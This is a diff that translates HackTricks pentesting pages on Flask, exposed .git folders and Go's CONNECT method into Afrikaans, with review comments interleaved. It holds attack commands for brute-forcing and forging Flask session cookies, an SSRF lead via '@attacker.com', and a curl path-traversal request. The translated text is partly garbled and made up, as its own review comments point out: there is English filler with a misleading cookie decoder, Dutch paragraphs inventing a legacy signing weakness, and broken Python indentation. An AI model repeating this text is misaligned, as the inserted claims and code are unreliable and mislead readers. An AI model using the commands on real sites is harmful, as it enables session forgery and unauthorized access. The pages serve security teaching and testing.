-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
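Review bot: `kan die aanvaller die beskerming omseil en die rekenaar uitvoer` says "run the computer"; the source `execute the calc` refers to the calculator, which the same paragraph already renders as `'n sakrekenaar` a few lines earlier, so use `sakrekenaar` here too. As in the other files: the title uses `Elektron` instead of `Electron`, the `RegExp.prototype.test` and `getGPUDriverVersions` blocks have lost their indentation (`-  return false;` became `+return false;`), and the footer spells the tricks `haktruuks` where the other files use `hacktruuks`. Two defects are carried over unchanged from the English side and could be fixed in the same pass: `file:///C:/Windows/systemd32/calc.exe` (the directory is `System32`) and the broken emphasis `in die interne verwerking van \_execa**\_**.`, which does not close its `**` correctly in either version.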
diff --git a/network-services-pentesting/pentesting-web/flask.md b/network-services-pentesting/pentesting-web/flask.md index 5dc842256..5123f37c5 100644 --- a/network-services-pentesting/pentesting-web/flask.md +++ b/network-services-pentesting/pentesting-web/flask.md @@ -2,105 +2,135 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -**Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.** +**Waarskynlik, as jy 'n CTF speel, sal 'n Flask-toepassing verband hou met** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.** -## Cookies +## Koekies -Default cookie session name is **`session`**. +Die verstek koekiesessienaam is **`session`**. ### Decoder -Online Flask coockies decoder: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi) +Aanlyn Flask-koekiesontleder: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi) -#### Manual - -Get the first part of the cookie until the first point and Base64 decode it> +#### Handleiding +Kry die eerste deel van die koekie tot by die eerste punt en dekodeer dit met Base64> ```bash echo "ImhlbGxvIg" | base64 -d ``` - -The cookie is also signed using a password +Die koekie word ook onderteken met behulp van 'n wagwoord ### **Flask-Unsign** -Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys. +Opdraglyninstrument om sessiekoekies van 'n Flask-toepassing te haal, te ontsyfer, te kragteloos te maak en te skep deur geheime sleutels te raai. 
{% embed url="https://pypi.org/project/flask-unsign/" %} - ```bash pip3 install flask-unsign ``` +#### **Dekodeer Koekie** -#### **Decode Cookie** +To decode a Flask cookie, you can use the `itsdangerous` library. This library provides a `URLSafeSerializer` class that allows you to serialize and deserialize data in a secure way. +Here's an example of how you can decode a Flask cookie using `itsdangerous`: + +```python +from itsdangerous import URLSafeSerializer + +def decode_cookie(cookie_value, secret_key): + serializer = URLSafeSerializer(secret_key) + try: + decoded_data = serializer.loads(cookie_value) + return decoded_data + except Exception as e: + print(f"Error decoding cookie: {e}") + return None +``` + +In the code above, the `decode_cookie` function takes the cookie value and the secret key as parameters. It creates an instance of the `URLSafeSerializer` class with the secret key, and then uses the `loads` method to decode the cookie value. If an error occurs during the decoding process, it will print an error message and return `None`. + +Remember to replace `secret_key` with the actual secret key used to sign the cookie. + +You can use this function to decode Flask cookies and extract the data stored in them. However, keep in mind that decoding a cookie does not guarantee the integrity or authenticity of the data. It is always recommended to validate and sanitize the data before using it. ```bash flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8' ``` - #### **Brute Force** +#### **Brute Krag** ```bash flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '' --no-literal-eval ``` +#### **Ondertekening** -#### **Signing** +Signing is a process used to ensure the integrity and authenticity of data. In the context of web applications, signing is often used to prevent tampering with data sent between the client and the server. 
+Ondertekening is 'n proses wat gebruik word om die integriteit en egtheid van data te verseker. In die konteks van webtoepassings word ondertekening dikwels gebruik om te voorkom dat data wat tussen die kliënt en die bediener gestuur word, gewysig word. + +When a client sends a request to the server, the server can sign the response using a secret key. This signature is then sent back to the client along with the response. The client can verify the integrity of the response by recalculating the signature using the same secret key and comparing it to the received signature. + +Wanneer 'n kliënt 'n versoek na die bediener stuur, kan die bediener die antwoord onderteken deur 'n geheime sleutel te gebruik. Hierdie handtekening word dan saam met die antwoord terug na die kliënt gestuur. Die kliënt kan die integriteit van die antwoord verifieer deur die handtekening opnuut te bereken met dieselfde geheime sleutel en dit te vergelyk met die ontvangde handtekening. + +Signing can also be used to authenticate the source of the data. By using a secret key known only to the server, the client can trust that the response came from the legitimate server and has not been tampered with. + +Ondertekening kan ook gebruik word om die bron van die data te verifieer. Deur 'n geheime sleutel te gebruik wat slegs aan die bediener bekend is, kan die kliënt vertrou dat die antwoord van die regmatige bediener afkomstig is en nie gewysig is nie. ```bash flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' ``` +#### Ondertekening met behulp van oude (verouderde versies) -#### Signing using legacy (old versions) +In sommige gevallen kan het nodig zijn om een applicatie te hacken die gebruikmaakt van een verouderde versie van Flask. Deze oudere versies kunnen kwetsbaarheden bevatten die kunnen worden misbruikt om toegang te krijgen tot de applicatie. +Een van de mogelijke aanvalstechnieken is het ondertekenen van gegevens met behulp van een verouderde versie van Flask. 
Deze techniek maakt gebruik van een zwakke handtekeningmethode die kan worden misbruikt om de handtekening te vervalsen en ongeautoriseerde toegang te verkrijgen. + +Om deze techniek toe te passen, moet je eerst de versie van Flask identificeren die wordt gebruikt door de applicatie. Dit kan worden gedaan door de HTTP-responsheaders te controleren of door de broncode van de applicatie te analyseren. + +Zodra je de versie hebt geïdentificeerd, kun je de juiste exploit gebruiken om de handtekening te vervalsen. Dit kan worden gedaan door de zwakke punten in de handtekeningmethode van de verouderde Flask-versie te benutten. + +Het is belangrijk op te merken dat deze techniek alleen van toepassing is op oudere versies van Flask en mogelijk niet werkt op recentere versies. Het is altijd raadzaam om de nieuwste versie van Flask te gebruiken om mogelijke beveiligingslekken te voorkomen. ```bash flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy ``` - ### **RIPsession** -Command line tool to brute-force websites using cookies crafted with flask-unsign. +Opdraglyninstrument om webwerwe te brute-force met behulp van koekies wat met flask-unsign saamgestel is. {% embed url="https://github.com/Tagvi/ripsession" %} - ```bash - ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt +ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt ``` +### SQLi in Flask-sessiekoekie met SQLmap -### SQLi in Flask session cookie with SQLmap +[**Hierdie voorbeeld**](../../pentesting-web/sql-injection/sqlmap/#eval) gebruik die sqlmap `eval` opsie om **outomaties sqlmap payloads te onderteken** vir Flask deur gebruik te maak van 'n bekende geheim. -[**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret. 
- -## Flask Proxy to SSRF - -[**In this writeup**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) it's explained how Flask allows a request starting with the charcter "@": +## Flask Proxy na SSRF +[**In hierdie uiteensetting**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) word verduidelik hoe Flask 'n versoek toelaat wat begin met die karakter "@": ```http GET @/ HTTP/1.1 Host: target.com Connection: close ``` - -Which in the following scenario: - +Watter een van die volgende scenario's: ```python from flask import Flask from requests import get @@ -111,32 +141,31 @@ SITE_NAME = 'https://google.com/' @app.route('/', defaults={'path': ''}) @app.route('/') def proxy(path): - return get(f'{SITE_NAME}{path}').content +return get(f'{SITE_NAME}{path}').content app.run(host='0.0.0.0', port=8080) ``` - -Could allow to introduce something like "@attacker.com" in order to cause a **SSRF**. +Kan toelaat om iets soos "@attacker.com" in te voer om 'n **SSRF** te veroorsaak.
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
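Review bot: The `+` lines added under the new `#### **Dekodeer Koekie**` heading (the `itsdangerous` / `URLSafeSerializer` explanation, the `decode_cookie` function and the three paragraphs after it) are untranslated English filler that does not belong in a translation PR and contradicts the section they sit in: the existing `flask-unsign --decode --cookie '...'` command decodes the cookie payload with no secret, whereas the inserted `decode_cookie(cookie_value, secret_key)` demands the secret key and verifies a signature, and a plain `URLSafeSerializer` is not the serializer configuration Flask itself uses for session cookies, so it should not be presented as a Flask cookie decoder. Drop that block and keep only the translated heading above the `flask-unsign --decode` command. In the same hunk, every paragraph under `#### **Ondertekening**` is added twice (an English `+` line followed by its Afrikaans rendering); remove the English copies. The three paragraphs added under `#### Ondertekening met behulp van oude (verouderde versies)` ("In sommige gevallen kan het nodig zijn...") are Dutch, not Afrikaans, and they assert a weak legacy signing method that can be exploited for forgery, which the original section never stated; it contained only the `flask-unsign --sign ... --legacy` command. Remove those paragraphs as well.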
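Review bot: In the `@@ -111,32 +141,31 @@` hunk the Python proxy example is broken: `-    return get(f'{SITE_NAME}{path}').content` becomes `+return get(f'{SITE_NAME}{path}').content` at column 0, so the `return` no longer sits inside `def proxy(path):` and the snippet is a SyntaxError. Code blocks must not be altered by the translation; restore the four-space indentation. The lead-in `-Which in the following scenario:` is also mistranslated as `+Watter een van die volgende scenario's:` ("which one of the following scenarios"), which changes the meaning; something like "Wat in die volgende scenario:" keeps the sense. The blank lines stripped around the ```http and ```python fences are unnecessary churn for a translation change.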
diff --git a/network-services-pentesting/pentesting-web/git.md b/network-services-pentesting/pentesting-web/git.md index 9b7944518..e60e35e7d 100644 --- a/network-services-pentesting/pentesting-web/git.md +++ b/network-services-pentesting/pentesting-web/git.md @@ -2,46 +2,46 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**To dump a .git folder from a URL use** [**https://github.com/arthaud/git-dumper**](https://github.com/arthaud/git-dumper) +**Om 'n .git-vouer van 'n URL te dump, gebruik** [**https://github.com/arthaud/git-dumper**](https://github.com/arthaud/git-dumper) -**Use** [**https://www.gitkraken.com/**](https://www.gitkraken.com/) **to inspect the content** +**Gebruik** [**https://www.gitkraken.com/**](https://www.gitkraken.com/) **om die inhoud te ondersoek** -If a _.git_ directory is found in a web application you can download all the content using _wget -r http://web.com/.git._ Then, you can see the changes made by using _git diff_. +As 'n _.git_-gids gevind word in 'n webtoepassing, kan jy al die inhoud aflaai deur _wget -r http://web.com/.git_ te gebruik. Dan kan jy die veranderinge sien deur _git diff_ te gebruik. -The tools: [Git-Money](https://github.com/dnoiz1/git-money), [DVCS-Pillage](https://github.com/evilpacket/DVCS-Pillage) and [GitTools](https://github.com/internetwache/GitTools) can be used to retrieve the content of a git directory. +Die gereedskap: [Git-Money](https://github.com/dnoiz1/git-money), [DVCS-Pillage](https://github.com/evilpacket/DVCS-Pillage) en [GitTools](https://github.com/internetwache/GitTools) kan gebruik word om die inhoud van 'n git-gids te herwin. -The tool [https://github.com/cve-search/git-vuln-finder](https://github.com/cve-search/git-vuln-finder) can be used to search for CVEs and security vulnerability messages inside commits messages. +Die gereedskap [https://github.com/cve-search/git-vuln-finder](https://github.com/cve-search/git-vuln-finder) kan gebruik word om te soek na CVE's en sekuriteitskwesbaarheidsboodskappe binne in toewydingsboodskappe. -The tool [https://github.com/michenriksen/gitrob](https://github.com/michenriksen/gitrob) search for sensitive data in the repositories of an organisations and its employees. 
+Die gereedskap [https://github.com/michenriksen/gitrob](https://github.com/michenriksen/gitrob) soek na sensitiewe data in die opgaarplekke van 'n organisasie en sy werknemers. -[Repo security scanner](https://github.com/UKHomeOffice/repo-security-scanner) is a command line-based tool that was written with a single goal: to help you discover GitHub secrets that developers accidentally made by pushing sensitive data. And like the others, it will help you find passwords, private keys, usernames, tokens and more. +[Repo security scanner](https://github.com/UKHomeOffice/repo-security-scanner) is 'n opdraggelyngebaseerde gereedskap wat geskryf is met 'n enkele doel: om jou te help om GitHub-geheime te ontdek wat ontwikkelaars per ongeluk gemaak het deur sensitiewe data te stuur. En soos die ander, sal dit jou help om wagwoorde, private sleutels, gebruikersname, tokens en meer te vind. -[TruffleHog](https://github.com/dxa4481/truffleHog) searches through GitHub repositories and digs through the commit history and branches, looking for accidentally committed secrets +[TruffleHog](https://github.com/dxa4481/truffleHog) deursoek GitHub-opgaarplekke en deursoek die toewydingsgeskiedenis en takke, op soek na per ongeluk geplaasde geheime -Here you can find an study about github dorks: [https://securitytrails.com/blog/github-dorks](https://securitytrails.com/blog/github-dorks) +Hier kan jy 'n studie oor GitHub-dorks vind: [https://securitytrails.com/blog/github-dorks](https://securitytrails.com/blog/github-dorks)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
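Review bot: Terminology in this file is inconsistent across the hunk: the header and footer render "github repos" as `GitHub-opslagplekke`, while the body line for gitrob uses `opgaarplekke` for "repositories"; pick one term. In the git-vuln-finder line, "commit messages" becomes `toewydingsboodskappe`, which is not the git term; keep "commit" untranslated (e.g. "commit-boodskappe"), as the surrounding tool names and `git diff` are kept in English.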
diff --git a/network-services-pentesting/pentesting-web/golang.md b/network-services-pentesting/pentesting-web/golang.md index 32906d936..dad68f1db 100644 --- a/network-services-pentesting/pentesting-web/golang.md +++ b/network-services-pentesting/pentesting-web/golang.md @@ -1,52 +1,46 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## CONNECT method +## CONNECT-metode -In the Go programming language, a common practice when handling HTTP requests, specifically using the `net/http` library, is the automatic conversion of the request path into a standardized format. This process involves: +In die Go-programmeertaal is dit 'n algemene praktyk om HTTP-versoeke te hanteer, spesifiek met behulp van die `net/http`-biblioteek, om die versoekpad outomaties na 'n gestandaardiseerde formaat om te skakel. Hierdie proses behels: -- Paths ending with a slash (`/`) like `/flag/` are redirected to their non-slash counterpart, `/flag`. -- Paths containing directory traversal sequences such as `/../flag` are simplified and redirected to `/flag`. -- Paths with a trailing period as in `/flag/.` are also redirected to the clean path `/flag`. +- Paaie wat eindig met 'n skuinstrek (`/`) soos `/flag/` word omgelei na hul nie-skuinstrek eweknie, `/flag`. +- Paaie wat gidsverspreidingsvolgordes bevat, soos `/../flag`, word vereenvoudig en omgelei na `/flag`. +- Paaie met 'n punt aan die einde, soos `/flag/.`, word ook omgelei na die skoon pad `/flag`. -However, an exception is observed with the use of the `CONNECT` method. Unlike other HTTP methods, `CONNECT` does not trigger the path normalization process. This behavior opens a potential avenue for accessing protected resources. By employing the `CONNECT` method alongside the `--path-as-is` option in `curl`, one can bypass the standard path normalization and potentially reach restricted areas. - -The following command demonstrates how to exploit this behavior: +Daar is egter 'n uitsondering met die gebruik van die `CONNECT`-metode. Anders as ander HTTP-metodes, veroorsaak `CONNECT` nie die padnormaliseringsproses nie. Hierdie gedrag skep 'n potensiële geleentheid om toegang tot beskermde hulpbronne te verkry. 
Deur die gebruik van die `CONNECT`-metode saam met die `--path-as-is`-opsie in `curl`, kan 'n persoon die standaard padnormalisering omseil en moontlik beperkte areas bereik. +Die volgende opdrag demonstreer hoe om van hierdie gedrag gebruik te maak: ```bash curl --path-as-is -X CONNECT http://gofs.web.jctf.pro/../flag ``` - [https://github.com/golang/go/blob/9bb97ea047890e900dae04202a231685492c4b18/src/net/http/server.go\#L2354-L2364](https://github.com/golang/go/blob/9bb97ea047890e900dae04202a231685492c4b18/src/net/http/server.go#L2354-L2364)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
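Review bot: In the bullet `+- Paaie wat gidsverspreidingsvolgordes bevat, soos `/../flag`...`, "directory traversal sequences" is rendered with `verspreiding` (spreading/distribution), which misstates the concept; use "gidsdeurkruisingsreekse" or keep the English term "directory traversal" as the technical name, matching how `CONNECT`, `net/http` and `--path-as-is` are left untranslated in the same hunk.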
- - diff --git a/network-services-pentesting/pentesting-web/grafana.md b/network-services-pentesting/pentesting-web/grafana.md index 367a7d769..827ffa091 100644 --- a/network-services-pentesting/pentesting-web/grafana.md +++ b/network-services-pentesting/pentesting-web/grafana.md @@ -2,38 +2,38 @@
